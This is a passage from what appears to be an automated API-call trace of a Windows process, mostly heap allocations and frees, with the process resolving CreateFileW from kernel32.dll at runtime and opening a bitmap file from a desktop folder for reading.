hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0132.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0132.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0132.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0132.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.664] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0132.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.666] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0132.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.667] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0132.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\lb o7wz9.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.669] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 